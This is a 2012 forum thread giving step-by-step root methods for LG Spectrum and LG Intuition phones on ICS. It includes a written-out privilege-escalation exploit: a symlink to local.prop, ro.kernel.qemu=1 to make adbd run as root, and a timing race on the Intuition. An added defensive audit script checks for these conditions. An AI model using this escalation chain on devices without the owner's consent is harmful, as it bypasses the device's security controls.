[ROOT] LG Intuition & LG Spectrum ICS

OP jcase

30th September 2012, 12:58 AM   |  #1  
jcase (OP, Forum Moderator / Senior Recognized Developer - Taco Vendor)
Source: http://www.androidpolice.com/2012/09...ectrum-on-ics/

If you find this useful please follow me (jcase) on twitter ( https://twitter.com/teamandirc/ ).

Here you go, root for both the new LG Intuition and the LG Spectrum running ICS. The vulnerability is a simple permission bug allowing us to set up a symlink to local.prop (yes, yet again). While the bug is the same, the procedure is slightly different, so I will have the instructions separate.

With the LG Intuition, they did seem to attempt to mitigate this attack, not by setting correct permissions, but by dropping adbD to the shell user if it runs as root, even if ro.kernel.qemu=1 is set. They failed: they give us enough time to run one command before dropping the root privileges, in our case a script to root the phone.

LG Spectrum ICS Root (for the leaked ICS rom):
Expect this to be patched in the release ROM. The leaked ICS ROM has locked bootloaders, i.e. no recovery at this point.

Files needed:
su ( http://dl.dropbox.com/u/8699733/lgroot/su )

adb shell

$ rm /data/vpnch/vpnc_starter_lock
$ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
$ exit

adb reboot

adb wait-for-device shell

$ echo 'ro.kernel.qemu=1' > /data/local.prop
$ exit

adb reboot

adb wait-for-device remount
adb push su /system/xbin/su
adb shell

# chown 0.0 /system/xbin/su
# chmod 06755 /system/xbin/su
# rm /data/local.prop
# rm /data/vpnch/vpnc_starter_lock
# reboot

Once rebooted, install Superuser from the market and enjoy.







LG Intuition Root

Files needed:
su ( http://dl.dropbox.com/u/8699733/lgroot/su )
lgroot.sh ( http://dl.dropbox.com/u/8699733/lgroot/lgroot.sh )

adb push su /data/local/tmp/su
adb push lgroot.sh /data/local/tmp/lgroot.sh

adb shell

$ chmod 777 /data/local/tmp/lgroot.sh
$ rm /data/vpnch/vpnc_starter_lock
$ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
$ exit

adb reboot

You may have to unplug/replug your phone to get some computers to pick it up again after this reboot.

adb wait-for-device shell

$ echo 'ro.kernel.qemu=1' > /data/local.prop
$ exit

Here is the important part: you will have to execute the next two commands one after the other. We want the second command to be fired off as soon as adbD comes up, before it drops root privileges. This may take a few minutes, and after the second command is complete you may have to unplug/replug your phone to get your computer to see it again.

adb reboot
adb wait-for-device /data/local/tmp/lgroot.sh

(Here is where you may have to unplug/replug, but only after the second command has run).

adb wait-for-device shell


$ su
# rm /data/local.prop
# rm /data/vpnch/vpnc_starter_lock
# reboot

Once rebooted, install Superuser from the market and enjoy.
Last edited by jcase; 30th September 2012 at 03:51 PM.
The Following 2 Users Say Thank You to jcase For This Useful Post: [ View ]
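Added example, not part of jcase's post or any LG code: a defender-side audit for the condition the post describes, a symlink inside a lock directory that resolves outside that directory (here toward local.prop), plus a check for a local.prop that sets ro.kernel.qemu=1. The function names and the temporary demo tree are constructed for illustration, and a readlink that supports -f is assumed.

```shell
#!/bin/sh
# Added defensive example; not part of the original post.

# audit_symlinks DIR: list symlinks under DIR that resolve outside DIR.
# Assumes a readlink that supports -f (GNU coreutils, busybox, toybox).
audit_symlinks() {
    dir=$(cd "$1" 2>/dev/null && pwd -P) || return 2
    find "$dir" -type l | while IFS= read -r link; do
        resolved=$(readlink -f "$link" 2>/dev/null)
        case "$resolved" in
            "$dir"/*) ;;                                   # stays inside DIR
            "") printf '%s -> (unresolvable)\n' "$link" ;;
            *)  printf '%s -> %s\n' "$link" "$resolved" ;; # escapes DIR
        esac
    done
}

# prop_enables_qemu FILE: succeed if FILE sets ro.kernel.qemu=1.
prop_enables_qemu() {
    [ -f "$1" ] && grep -Eq \
        '^[[:space:]]*ro\.kernel\.qemu[[:space:]]*=[[:space:]]*1[[:space:]]*$' "$1"
}

# demo: constructed tree that mirrors the path names mentioned in the post.
demo() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/data/vpnch"
    : > "$root/data/vpnch/ordinary_lock"
    ln -s ordinary_lock "$root/data/vpnch/inside_link"
    ln -s "$root/data/local.prop" "$root/data/vpnch/vpnc_starter_lock"
    echo 'ro.kernel.qemu=1' > "$root/data/local.prop"
    audit_symlinks "$root/data/vpnch"
    prop_enables_qemu "$root/data/local.prop" &&
        echo "local.prop sets ro.kernel.qemu=1"
    rm -rf "$root"
}

# With an argument, audit that directory; otherwise run the constructed demo.
if [ "$#" -gt 0 ]; then audit_symlinks "$1"; else demo; fi
```

Only the link that leaves the audited directory is reported; the link that stays inside it is not.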
30th September 2012, 02:17 AM   |  #2  
LostCauseSPM (Junior Member)
Thanks!
Dude, it has been killing me not having root since I managed to get the leaked ICS installed. But I tried this, and just wasn't having any luck. I tried to make a .bat file for it, no go. So I tried inputting it line by line and I keep getting hung up at the $ echo 'ro.kernel.qemu=1' part. Just wondering if anyone else is having this problem.
Also, since yesterday whenever I check for a software update, I'm getting an "error occurred during download". I was wondering if I would even be able to get the final ICS OTA when it finally is available.
Thanks again jcase!
30th September 2012, 02:36 AM   |  #3  
jcase (OP, Forum Moderator / Senior Recognized Developer - Taco Vendor)
Quote:
Originally Posted by LostCauseSPM

Dude, it has been killing me not having root since I managed to get the leaked ICS installed. But I tried this, and just wasn't having any luck. I tried to make a .bat file for it, no go. So I tried inputting it line by line and I keep getting hung up at the $ echo 'ro.kernel.qemu=1' part. Just wondering if anyone else is having this problem.
Also, since yesterday whenever I check for a software update, I'm getting an "error occurred during download". I was wondering if I would even be able to get the final ICS OTA when it finally is available.
Thanks again jcase!

Which specific ICS version do you have? I had a couple of different leaks to work with.
30th September 2012, 02:53 AM   |  #4  
LostCauseSPM (Junior Member)
Quote:
Originally Posted by jcase

Which specific ICS version do you have? I had a couple of different leaks to work with.

build #: IMM76D
Still tweaking on it. Just updated all my drivers, too. I'm not a total newb, but I'm no pro, either.
30th September 2012, 02:56 AM   |  #5  
Quote:
Originally Posted by jcase

Source: http://www.androidpolice.com/2012/09...ectrum-on-ics/


LG Intuition Root

Files needed:
su ( http://dl.dropbox.com/u/8699733/lgroot/su )
lgroot.sh ( http://dl.dropbox.com/u/8699733/lgroot/lgroot.sh )

adb push su /data/local/tmp/su
adb push lgroot.sh /data/local/tmp/lgroot.sh

adb shell

$ chmod 777 /data/local/tmp/lgroot.sh
$ rm /data/vpnch/vpnc_starter_lock
$ ln -s /data/local.prop /data/vpnch/vpnc_starter_lock
$ exit

adb reboot

You may have to unplug/replug your phone to get some computers to pick it up again after this reboot.

adb wait-for-device shell

$ echo 'ro.kernel.qemu=1' > /data/local.prop
$ exit

Here is the important part: you will have to execute the next two commands one after the other. We want the second command to be fired off as soon as adbD comes up, before it drops root privileges. This may take a few minutes, and after the second command is complete you may have to unplug/replug your phone to get your computer to see it again.

adb reboot
adb wait-for-device /data/local/tmp/lgroot.sh

(Here is where you may have to unplug/replug, but only after the second command has run).

adb wait-for-device shell


$ su
# rm /data/local.prop
# rm /data/vpnch/vpnc_starter_lock
# reboot

Once rebooted, install Superuser from the market and enjoy.

I tried, but as soon as I entered adb shell it kicked me off and I haven't been able to try since.
30th September 2012, 03:37 AM   |  #6  
LostCauseSPM (Junior Member)
Quote:
Originally Posted by jcase

Which specific ICS version do you have? I had a couple of different leaks to work with.

I've got the Spectrum, btw. Still trying to make a nice, clean, automated .bat, but it keeps failing now at the remount command.

---------- Post added at 07:37 PM ---------- Previous post was at 07:24 PM ----------

And now it is saying "rm failed for /data/vpnch..."
When the remount fails, I get a "remount failed: operation not permitted" message.
Hope this is useful to you.
30th September 2012, 03:41 AM   |  #7  
jcase (OP, Forum Moderator / Senior Recognized Developer - Taco Vendor)
Quote:
Originally Posted by LostCauseSPM

I've got the Spectrum, btw. Still trying to make a nice, clean, automated .bat, but it keeps failing now at the remount command.

---------- Post added at 07:37 PM ---------- Previous post was at 07:24 PM ----------

And now it is saying "rm failed for /data/vpnch..."
When the remount fails, I get a "remount failed: operation not permitted" message.
Hope this is useful to you.

Add jcase@cunninglogic.com to gtalk and hit me up.
30th September 2012, 03:42 AM   |  #8  
jcase (OP, Forum Moderator / Senior Recognized Developer - Taco Vendor)
Quote:
Originally Posted by lahegry

I tried, but as soon as I entered adb shell it kicked me off and I haven't been able to try since.

Unplug/replug. The Intuition is very touchy. Might need to do it from another system or with another cable.
30th September 2012, 03:45 AM   |  #9  
Quote:
Originally Posted by jcase

Unplug/replug. The Intuition is very touchy. Might need to do it from another system or with another cable.

I don't think I'm fast enough, I just can't type faster than it kicks me off.
30th September 2012, 03:55 AM   |  #10  
jcase (OP, Forum Moderator / Senior Recognized Developer - Taco Vendor)
Quote:
Originally Posted by lahegry

I don't think I'm fast enough, I just can't type faster than it kicks me off.

Place the two commands into a batch file/shell script, or set up TeamViewer and msg me on gtalk.
